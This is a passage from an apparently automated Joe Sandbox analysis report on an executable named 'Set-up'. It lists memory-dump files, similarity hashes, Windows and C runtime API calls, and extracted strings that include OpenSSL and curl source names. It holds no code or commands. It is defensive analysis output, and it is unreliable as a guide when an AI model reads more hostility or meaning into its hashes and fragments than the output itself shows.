                                    • Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd
                                    Similarity
                                    • API ID: _errno$abortmemcpymemset
                                    • String ID: UTF-8
                                    • API String ID: 3754757788-243350608
                                    • Opcode ID: 27310dd004e90a4a454ecd8ff1d72fb7f0531c84e93b4a7dbe279f072b7b9bd5
                                    • Instruction ID: 4a7b5057ef7b3fca542920621d7d3e6bff89ee7535808fe37fd0070e4c726c08
                                    • Opcode Fuzzy Hash: 27310dd004e90a4a454ecd8ff1d72fb7f0531c84e93b4a7dbe279f072b7b9bd5
                                    • Instruction Fuzzy Hash: 4D41FA706043019FFB139F69D895AAB7BDA9B85314F08896DF4C5872C1EA33D854CB52
                                    APIs
                                    • strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00C82359
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00C82465
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00C824AB
                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00C823EE
                                      • Part of subcall function 00C81A54: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00C81A70
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd
                                    Similarity
                                    • API ID: free$abortmallocstrlen
                                    • String ID: $ $ $Memory allocation failed for decrypted data.
                                    • API String ID: 673139954-1317699236
                                    • Opcode ID: 34464bc58f2b7c576a8e223511d69a9cb9f1c527079fc449f66308d00cb3104c
                                    • Instruction ID: f565d1e5dab9e94e73bd8ed693c15b676d3bdbd883ca3886835dda870a2ac85b
                                    • Opcode Fuzzy Hash: 34464bc58f2b7c576a8e223511d69a9cb9f1c527079fc449f66308d00cb3104c
                                    • Instruction Fuzzy Hash: B651A2B49047099FCB04EFA9C08499EBBF0FF88304F10C96AE898A7325E774D9459F56
                                    APIs
                                    • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00E9E16C
                                    • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00E9E17B
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd
                                    Similarity
                                    • API ID: strlen
                                    • String ID: $ for$:$Ente$crypto/ui/ui_lib.c$er
                                    • API String ID: 39653677-1187194756
                                    • Opcode ID: 8ffc3805d0e24633fc02d1eda704f6b409f3c356e0135078664f2586aa75232c
                                    • Instruction ID: a51e8dfcf32b035abf2ef9a01ad7c4bbe70826ff9e0b06452726d7a2a596a19a
                                    • Opcode Fuzzy Hash: 8ffc3805d0e24633fc02d1eda704f6b409f3c356e0135078664f2586aa75232c
                                    • Instruction Fuzzy Hash: C02186F2D052107BE714AA566C41E6B77ECED91398F095839FE4CA6342F631CA18C6A2
                                    APIs
                                      • Part of subcall function 00C9D8C0: QueryPerformanceCounter.KERNEL32(?,?,?,?,?,00000000,?,0000001C,?,00C901B1), ref: 00C9D8E2
                                    • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,00CC420E,?,?), ref: 00C96350
                                    • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(00CC420E,?,?,?,?,?,?,?,?,?,00CC420E,?,?), ref: 00C9635B
                                    • MoveFileExA.KERNEL32(00000000,00000000,00000001(MOVEFILE_REPLACE_EXISTING)), ref: 00C96369
                                    • Sleep.KERNEL32(00000001), ref: 00C963B2
                                    • MoveFileExA.KERNEL32(00000000,00000000,00000001(MOVEFILE_REPLACE_EXISTING)), ref: 00C963BC
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,00CC420E,?,?), ref: 00C963C7
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,00CC420E,?,?), ref: 00C963D6
                                      • Part of subcall function 00C9D8C0: GetTickCount.KERNEL32 ref: 00C9D968
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 00C963ED
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd
                                    Similarity
                                    • API ID: free$FileMove_strdup$CountCounterPerformanceQuerySleepTick
                                    • String ID:
                                    • API String ID: 1793959362-0
                                    • Opcode ID: 9ccbc967a0249ca841c063b688a7d396bd8b636166bbf9c0c1dec90699cf57e3
                                    • Instruction ID: bec53f737166c6514bccca23a97ac3f449b2398ebb191491d0e681bcaadaf985
                                    • Opcode Fuzzy Hash: 9ccbc967a0249ca841c063b688a7d396bd8b636166bbf9c0c1dec90699cf57e3
                                    • Instruction Fuzzy Hash: 63112BA6D0070067FF127624AC45BBF735CBFA5764F094225FC5852282FB21EA5543D3
                                    APIs
                                    • _time64.API-MS-WIN-CRT-TIME-L1-1-0(00000000), ref: 00C8623A
                                    • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00C8624D
                                    • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,00000000), ref: 00C8627C
                                    • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00C86389
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd
                                    Similarity
                                    • API ID: strlen$_time64memcpy
                                    • String ID: .$hsts.c
                                    • API String ID: 2198566249-2242870694
                                    • Opcode ID: 1c5ac83622b3213a0544f23d4a6c84d964ad86543dbfb876ff884ae36f606290
                                    • Instruction ID: 26284848fc87bceb429dfa9238d418efced65a364fcb7532ed7784cf87d2c845
                                    • Opcode Fuzzy Hash: 1c5ac83622b3213a0544f23d4a6c84d964ad86543dbfb876ff884ae36f606290
                                    • Instruction Fuzzy Hash: 1A4119BAD083446BEB107E60AC46BAB36885F2431DF080538FD5A53293F671E9289796
                                    APIs
                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,0000002E), ref: 0100447B
                                    • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,00000042), ref: 010044C4
                                    • WSAStringToAddressW.WS2_32(?,00000002,00000000,?,00000010), ref: 010044E3
                                    • strlen.API-MS-WIN-CRT-STRING-L1-1-0(0000002E), ref: 01004500
                                    • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 0100450B
                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,0000002E), ref: 0100451F
                                    • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 01004546
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd
                                    Similarity
                                    • API ID: strlen$strcmp$AddressByteCharMultiStringWide
                                    • String ID:
                                    • API String ID: 389649969-0
                                    • Opcode ID: 0823f8e9ae17aaeb768030e7c87d44536a27add81775cfb543356a269fc89484
                                    • Instruction ID: 300fbd53f97c126426310a44cab8d7e0b64cfc5139363995fb4ded5129e81214
                                    • Opcode Fuzzy Hash: 0823f8e9ae17aaeb768030e7c87d44536a27add81775cfb543356a269fc89484
                                    • Instruction Fuzzy Hash: C3314DB290470567FB229A38DC00BFF76CC9B95355F044239FAD8D61C2EA75E9488356
                                    APIs
                                    • wcslen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000,?,?,00EBF763,?,?,?,?,?), ref: 00EC2251
                                    • WideCharToMultiByte.KERNEL32 ref: 00EC2284
                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000), ref: 00EC22BD
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd
                                    Similarity
                                    • API ID: ByteCharMultiWide$wcslen
                                    • String ID: ERR_CAPI_error$engines/e_capi.c$engines/e_capi_err.c
                                    • API String ID: 1062461220-336193293
                                    • Opcode ID: 1f1faf847ce67f231bd557908549959a9c68b8c93092f253983fcc17053072e3
                                    • Instruction ID: 0c1aa6c3a3bde901546b048cc3da342bcd18664ff2c277dbe07a57d896ec0b45
                                    • Opcode Fuzzy Hash: 1f1faf847ce67f231bd557908549959a9c68b8c93092f253983fcc17053072e3
                                    • Instruction Fuzzy Hash: 54214DB1E053456BF3303A61AD06F2B7A9CDB40708F14643DFB4C751C5FABA98058B61
                                    APIs
                                    • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,?,00DDA9CE,000000D2), ref: 00E383A3
                                    • strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00DDA9CE), ref: 00E383C6
                                      • Part of subcall function 00E360E0: GetLastError.KERNEL32(00E37CCC,?,00000000,00E37127,00E37CCC,00000000,00E5CAB7,00C81A70), ref: 00E360E3
                                      • Part of subcall function 00E360E0: SetLastError.KERNEL32(00000000), ref: 00E361A5
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd
                                    Similarity
                                    • API ID: ErrorLast$strcpystrlen
                                    • String ID: crypto/err/err_local.h
                                    • API String ID: 542397150-344804083
                                    • Opcode ID: 1593ffd9a27391eec6738ee74d95466e59feb617c4f47b2b4f45241337e2d885
                                    • Instruction ID: 9ae8624be78c66e3a4c4dbf03ce8de6ae300b3e22ad46dd1ea5ab00069cd837e
                                    • Opcode Fuzzy Hash: 1593ffd9a27391eec6738ee74d95466e59feb617c4f47b2b4f45241337e2d885
                                    • Instruction Fuzzy Hash: 7D819671500B01AFE7238F28E999BE3BBE4FB4030CF545D19E6D5972A5EB79A814CB40
                                    APIs
                                      • Part of subcall function 00C873F0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,#HttpOnly_,?,00C8CA95,011F8138,00000467,mprintf.c), ref: 00C8741D
                                      • Part of subcall function 00C873F0: memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(-00000008,?,00000001), ref: 00C87445
                                      • Part of subcall function 00CC47D0: fgets.API-MS-WIN-CRT-STDIO-L1-1-0(00000080,00000080,?), ref: 00CC47FB
                                      • Part of subcall function 00CC47D0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 00CC480C
                                      • Part of subcall function 00CC47D0: feof.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 00CC4837
                                    • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000001), ref: 00C86844
                                    • memcmp.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,unlimited,0000000A), ref: 00C86876
                                    • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 00C868FD
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd
                                    Similarity
                                    • API ID: strlen$feoffgetsmemcmpmemcpy
                                    • String ID: %256s "%64[^"]"$hsts.c$unlimited
                                    • API String ID: 288886899-2895786126
                                    • Opcode ID: 99894c91a238162967bb70057642f08cce2dfc80dcfddf1bc655b36187202d9a
                                    • Instruction ID: 8e9f0a1a8352764355847933a6c5b1f5934490061c8f5b86286645276634817b
                                    • Opcode Fuzzy Hash: 99894c91a238162967bb70057642f08cce2dfc80dcfddf1bc655b36187202d9a
                                    • Instruction Fuzzy Hash: 495146B59483017BEB24BB20DC42F2B7698AF91708F14492CF89DA62C2F731DA14D797
                                    APIs
                                    • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00000001,00E79265,?,00000400,00000000,?), ref: 00E78254
                                    • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,00E79265,?), ref: 00E78264
                                    • memset.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,00E79265,?,?,?,?,?,?,00E79265,?,00000400,00000000,?), ref: 00E782C7
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd
                                    Similarity
                                    • API ID: memcpymemsetstrlen
                                    • String ID: Enter PEM pass phrase:$PEM_def_callback$crypto/pem/pem_lib.c
                                    • API String ID: 160209724-3271887637
                                    • Opcode ID: 5dd17d62c7c6d24a8fc04029bd50195ba21cbd9694965f9a9a1f4fb65fa13c53
                                    • Instruction ID: d7da366ca5d56e243935ef0f279f14d0c98863a7aec800f4d1ac52d4b9884c44
                                    • Opcode Fuzzy Hash: 5dd17d62c7c6d24a8fc04029bd50195ba21cbd9694965f9a9a1f4fb65fa13c53
                                    • Instruction Fuzzy Hash: DD01F5E2B052117BE12175657C86FAB3ACCDBA5B65F04403AFE44A21C2E9509C0551F2
                                    APIs
                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00D2895D
                                    • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00D28991
                                    • _fileno.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00D2899A
                                    • _write.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00D289AB
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00D289B4
                                    • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00D289B9
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd
                                    Similarity
                                    • API ID: __acrt_iob_func_fileno_writeabortfreemalloc
